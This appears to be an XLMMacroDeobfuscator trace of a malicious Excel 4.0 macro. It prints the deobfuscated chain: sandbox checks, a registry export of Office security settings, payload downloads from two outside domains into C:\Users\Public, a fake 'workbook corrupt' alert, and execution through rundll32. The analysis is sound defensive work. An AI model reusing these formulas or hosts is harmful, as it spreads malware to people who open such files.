dissectmalware

sample - macro

May 24th, 2020
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\33719faebf43bf99964ae15582a7dbbfe42605a203c7725913fb4c6bbf69d69f
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->Sheet2!$HT$59712
  25. [Starting Deobfuscation]
  26. CELL:HT59712 , FullEvaluation , SET.VALUE(Sheet2!IJ9596,-384)
  27. CELL:HT59713 , FullEvaluation , GOTO(AG21387)
  28. CELL:AG21387 , FullEvaluation , SET.VALUE(Sheet2!GY52195,-50.25)
  29. CELL:AG21388 , FullEvaluation , RUN(Sheet2!HU17490)
  30. CELL:HU17490 , FullEvaluation , SET.VALUE(Sheet2!II36015,-424)
  31. CELL:HU17491 , FullEvaluation , RUN(Sheet2!DX56863)
  32. CELL:DX56863 , FullEvaluation , SET.VALUE(Sheet2!AN30204,15)
  33. CELL:DX56864 , FullEvaluation , GOTO(AL48276)
  34. CELL:AL48276 , FullEvaluation , SET.VALUE(Sheet2!HB58617,-378)
  35. CELL:AL48277 , FullEvaluation , GOTO(HE48767)
  36. CELL:HE48767 , FullEvaluation , SET.VALUE(Sheet2!AZ18076,348)
  37. CELL:HE48768 , FullEvaluation , RUN(Sheet2!GC38061)
  38. CELL:GC38061 , FullEvaluation , SET.VALUE(Sheet2!ED33513,-244)
  39. CELL:GC38062 , FullEvaluation , RUN(Sheet2!GK49742)
  40. CELL:GK49742 , FullEvaluation , SET.VALUE(Sheet2!GV40795,479)
  41. CELL:GK49743 , FullEvaluation , RUN(Sheet2!DK20776)
  42. CELL:DK20776 , FullEvaluation , SET.VALUE(Sheet2!FP3792,-59)
  43. CELL:DK20777 , FullEvaluation , RUN(Sheet2!DK24943)
  44. CELL:DK24943 , FullEvaluation , SET.VALUE(Sheet2!HN2684,-218)
  45. CELL:DK24944 , FullEvaluation , RUN(Sheet2!BB26751)
  46. CELL:BB26751 , FullEvaluation , FORMULA("=CLOSE(FALSE)",Sheet2!HQ31495)
  47. CELL:BB26752 , FullEvaluation , GOTO(GU63993)
  48. CELL:GU63993 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Sheet2!GU63994)
  49. CELL:GU63994 , PartialEvaluation , APP.MAXIMIZE()
  50. CELL:GU63995 , FullEvaluation , GOTO(DY16980)
  51. CELL:DY16980 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)",Sheet2!DY16981)
  52. CELL:DY16981 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)
  53. CELL:DY16982 , FullEvaluation , RUN(Sheet2!X59768)
  54. CELL:X59768 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))",Sheet2!X59769)
  55. CELL:X59769 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))
  56. CELL:X59770 , FullEvaluation , GOTO(N10466)
  57. CELL:N10466 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)",Sheet2!N10467)
  58. CELL:N10467 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)
  59. CELL:N10468 , FullEvaluation , GOTO(DA11989)
  60. CELL:DA11989 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)",Sheet2!DA11990)
  61. CELL:DA11990 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)
  62. CELL:DA11991 , FullEvaluation , GOTO(GG418)
  63. CELL:GG418 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)",Sheet2!GG419)
  64. CELL:GG419 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)
  65. CELL:GG420 , FullEvaluation , RUN(Sheet2!FJ54706)
  66. CELL:FJ54706 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)",Sheet2!FJ54707)
  67. CELL:FJ54707 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)
  68. CELL:FJ54708 , FullEvaluation , RUN(Sheet2!DS37251)
  69. CELL:DS37251 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))",Sheet2!DS37252)
  70. CELL:DS37252 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))
  71. CELL:DS37253 , FullEvaluation , GOTO(ED41335)
  72. CELL:ED41335 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))",Sheet2!ED41336)
  73. CELL:ED41336 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))
  74. CELL:ED41337 , FullEvaluation , RUN(Sheet2!AS51609)
  75. CELL:AS51609 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))",Sheet2!AS51610)
  76. CELL:AS51610 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))
  77. CELL:AS51610 , FullEvaluation , [TRUE]
  78. CELL:AS51611 , FullEvaluation , GOTO(FA48687)
  79. CELL:FA48687 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!AF47942)
  80. CELL:FA48688 , FullEvaluation , GOTO(FP63244)
  81. CELL:FP63244 , FullEvaluation , FORMULA("=""C:\Users\Public\9P8BL.reg""",Sheet2!FL62273)
  82. CELL:FP63245 , FullEvaluation , RUN(Sheet2!U61287)
  83. CELL:U61287 , FullEvaluation , FORMULA("=R[-15427]C[-64]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-1096]C[72]&"" /y""",Sheet2!CR63369)
  84. CELL:U61288 , FullEvaluation , GOTO(HO48351)
  85. CELL:HO48351 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!EP31804)
  86. CELL:HO48352 , FullEvaluation , RUN(Sheet2!HS62292)
  87. CELL:HS62292 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-30489]C[-81],R[1076]C[-131],0,5)",Sheet2!HS62293)
  88. CELL:HS62293 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","GET.WORKSPACE(2)\Excel\Security /y",0,5)
  89. CELL:HS62294 , FullEvaluation , RUN(Sheet2!IH52343)
  90. CELL:IH52343 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[9927]C[-74])))",Sheet2!IH52346)
  91. CELL:IH52344 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!IH52347)
  92. CELL:IH52345 , FullEvaluation , FORMULA("=NEXT()",Sheet2!IH52348)
  93. CELL:IH52346 , PartialEvaluation , WHILE(ISERROR(FILES("C:\Users\Public\9P8BL.reg")))
  94. CELL:IH52347 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
  95. CELL:IH52348 , PartialEvaluation , NEXT()
  96. CELL:IH52349 , FullEvaluation , RUN(Sheet2!HS55844)
  97. CELL:HS55844 , FullEvaluation , FORMULA("=FOPEN(R[6428]C[-59])",Sheet2!HS55845)
  98. CELL:HS55845 , PartialEvaluation , FOPEN("C:\Users\Public\9P8BL.reg")
  99. CELL:HS55846 , FullEvaluation , RUN(Sheet2!AB41868)
  100. CELL:AB41868 , FullEvaluation , FORMULA("=FPOS(R[13976]C[199],215)",Sheet2!AB41869)
  101. CELL:AB41869 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\9P8BL.reg"")",215)
  102. CELL:AB41870 , FullEvaluation , RUN(Sheet2!HA21230)
  103. CELL:HA21230 , FullEvaluation , FORMULA("=FREAD(R[34614]C[18],255)",Sheet2!HA21231)
  104. CELL:HA21231 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\9P8BL.reg"")",255)
  105. CELL:HA21232 , FullEvaluation , RUN(Sheet2!AM17289)
  106. CELL:AM17289 , FullEvaluation , FORMULA("=FCLOSE(R[38555]C[188])",Sheet2!AM17290)
  107. CELL:AM17290 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\9P8BL.reg"")")
  108. CELL:AM17291 , FullEvaluation , GOTO(CJ61198)
  109. CELL:CJ61198 , FullEvaluation , FORMULA("=FILE.DELETE(R[1074]C[80])",Sheet2!CJ61199)
  110. CELL:CJ61199 , PartialEvaluation , FILE.DELETE("C:\Users\Public\9P8BL.reg")
  111. CELL:CJ61200 , FullEvaluation , RUN(Sheet2!HL8081)
  112. CELL:HL8081 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[13149]C[-11])),GOTO(R[23413]C[5]),)",Sheet2!HL8082)
  113. CELL:HL8082 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[13149]C[-11])),GOTO(R[23413]C[5]),)
  114. CELL:HL8082 , FullEvaluation , [TRUE] GOTO(R[23413]C[5])
  115. CELL:HQ31495 , End , CLOSE(FALSE)
  116. CELL:HL8082 , FullEvaluation , [FALSE]
  117. CELL:HL8083 , FullEvaluation , RUN(Sheet2!BG35275)
  118. CELL:BG35275 , FullEvaluation , FORMULA("=""C:\Users\Public\IYNI.html""",Sheet2!L38143)
  119. CELL:BG35276 , FullEvaluation , GOTO(DG2112)
  120. CELL:DG2112 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!FU50289)
  121. CELL:DG2113 , FullEvaluation , RUN(Sheet2!AE58006)
  122. CELL:AE58006 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-7718]C[146],R[-19864]C[-19],0,0)",Sheet2!AE58007)
  123. CELL:AE58007 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\IYNI.html",0,0)
  124. CELL:AE58008 , FullEvaluation , GOTO(HH2203)
  125. CELL:HH2203 , FullEvaluation , FORMULA("=FILES(R[35939]C[-204])",Sheet2!HH2204)
  126. CELL:HH2204 , PartialEvaluation , FILES("C:\Users\Public\IYNI.html")
  127. CELL:HH2205 , FullEvaluation , RUN(Sheet2!GU20999)
  128. CELL:GU20999 , FullEvaluation , FORMULA("=IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)",Sheet2!GU21000)
  129. CELL:GU21000 , FullBranching , IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)
  130. CELL:GU21000 , FullEvaluation , [TRUE] GOTO(R[10495]C[22])
  131. CELL:HQ31495 , End , CLOSE(FALSE)
  132. CELL:GU21000 , FullEvaluation , [FALSE]
  133. CELL:GU21001 , FullEvaluation , RUN(Sheet2!GP10315)
  134. CELL:GP10315 , FullEvaluation , SET.VALUE(Sheet2!A1626,214)
  135. CELL:GP10316 , FullEvaluation , GOTO(CQ36304)
  136. CELL:CQ36304 , FullEvaluation , SET.VALUE(Sheet2!IM10026,-162)
  137. CELL:CQ36305 , FullEvaluation , RUN(Sheet2!C21349)
  138. CELL:C21349 , FullEvaluation , SET.VALUE(Sheet2!DB6239,-293)
  139. CELL:C21350 , FullEvaluation , RUN(Sheet2!HD9329)
  140. CELL:HD9329 , FullEvaluation , SET.VALUE(Sheet2!AT45907,-65)
  141. CELL:HD9330 , FullEvaluation , GOTO(GI63368)
  142. CELL:GI63368 , FullEvaluation , SET.VALUE(Sheet2!AH38851,-52.25)
  143. CELL:GI63369 , FullEvaluation , GOTO(ET46416)
  144. CELL:ET46416 , FullEvaluation , SET.VALUE(Sheet2!BW44660,-36)
  145. CELL:ET46417 , FullEvaluation , RUN(Sheet2!BU4702)
  146. CELL:BU4702 , FullEvaluation , SET.VALUE(Sheet2!IJ26702,83)
  147. CELL:BU4703 , FullEvaluation , RUN(Sheet2!HK45441)
  148. CELL:HK45441 , FullEvaluation , SET.VALUE(Sheet2!HX58665,235)
  149. CELL:HK45442 , FullEvaluation , GOTO(CP20663)
  150. CELL:CP20663 , FullEvaluation , SET.VALUE(Sheet2!CI20337,17.5)
  151. CELL:CP20664 , FullEvaluation , RUN(Sheet2!IF25037)
  152. CELL:IF25037 , FullEvaluation , SET.VALUE(Sheet2!IU16716,430)
  153. CELL:IF25038 , FullEvaluation , RUN(Sheet2!DK58580)
  154. CELL:DK58580 , FullEvaluation , FORMULA("=""C:\Users\Public\NvZsap.html""",Sheet2!HL64438)
  155. CELL:DK58581 , FullEvaluation , GOTO(BU10983)
  156. CELL:BU10983 , FullEvaluation , FORMULA("=""https://activediscounts.club/wp-data.php""",Sheet2!CM18954)
  157. CELL:BU10984 , FullEvaluation , RUN(Sheet2!BC4497)
  158. CELL:BC4497 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-17736]C[-13],R[27748]C[116],0,0)",Sheet2!CZ36690)
  159. CELL:BC4498 , FullEvaluation , GOTO(CW5342)
  160. CELL:CW5342 , FullEvaluation , FORMULA("=FILES(R[114]C[150])",Sheet2!BR64324)
  161. CELL:CW5343 , FullEvaluation , RUN(Sheet2!DJ35113)
  162. CELL:DJ35113 , FullEvaluation , FORMULA("=IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))",Sheet2!CT18293)
  163. CELL:DJ35114 , FullEvaluation , RUN(Sheet2!EI26842)
  164. CELL:EI26842 , FullEvaluation , FORMULA("=""https://hackcheatsonline.club/wp-data.php""",Sheet2!T16882)
  165. CELL:EI26843 , FullEvaluation , RUN(Sheet2!IC16090)
  166. CELL:IC16090 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28101]C[-88],R[19455]C[112],0,0)",Sheet2!DD44983)
  167. CELL:IC16091 , FullEvaluation , GOTO(FY11752)
  168. CELL:FY11752 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!AU55970)
  169. CELL:FY11753 , FullEvaluation , GOTO(EU6902)
  170. CELL:EU6902 , FullEvaluation , FORMULA("=ALERT(R[44247]C[32])",Sheet2!O11723)
  171. CELL:EU6903 , FullEvaluation , GOTO(GP57037)
  172. CELL:GP57037 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!DX21867)
  173. CELL:GP57038 , FullEvaluation , RUN(Sheet2!DT43174)
  174. CELL:DT43174 , FullEvaluation , FORMULA("=R[58909]C[191]&"",DllRegisterServer""",Sheet2!AC5529)
  175. CELL:DT43175 , FullEvaluation , GOTO(AV52824)
  176. CELL:AV52824 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[14289]C[-123],R[-2049]C[-222],0,5)",Sheet2!IQ7578)
  177. CELL:AV52825 , FullEvaluation , RUN(Sheet2!CZ36690)
  178. CELL:CZ36690 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://activediscounts.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
  179. CELL:CZ36691 , FullEvaluation , GOTO(BR64324)
  180. CELL:BR64324 , PartialEvaluation , FILES("C:\Users\Public\NvZsap.html")
  181. CELL:BR64325 , FullEvaluation , GOTO(CT18293)
  182. CELL:CT18293 , FullBranching , IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))
  183. CELL:CT18293 , FullEvaluation , [TRUE]
  184. CELL:CT18294 , FullEvaluation , GOTO(T16882)
  185. CELL:T16882 , FullEvaluation , "https://hackcheatsonline.club/wp-data.php"
  186. CELL:T16883 , FullEvaluation , GOTO(DD44983)
  187. CELL:DD44983 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://hackcheatsonline.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
  188. CELL:DD44984 , FullEvaluation , GOTO(AU55970)
  189. CELL:AU55970 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  190. CELL:AU55971 , FullEvaluation , GOTO(O11723)
  191. CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  192. CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
  193. CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  194. CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
  195. CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
  196. CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
  197. CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
  198. CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
  199. CELL:HQ31495 , End , CLOSE(FALSE)
  200. CELL:CT18293 , FullEvaluation , [FALSE] RUN(Sheet2!O11723)
  201. CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  202. CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
  203. CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  204. CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
  205. CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
  206. CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
  207. CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
  208. CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
  209. CELL:HQ31495 , End , CLOSE(FALSE)
  210. CELL:AS51610 , FullEvaluation , [FALSE] GOTO(R[-20115]C[180])
  211. CELL:HQ31495 , End , CLOSE(FALSE)
  212. [END of Deobfuscation]
  213. time elapsed: 5.855288743972778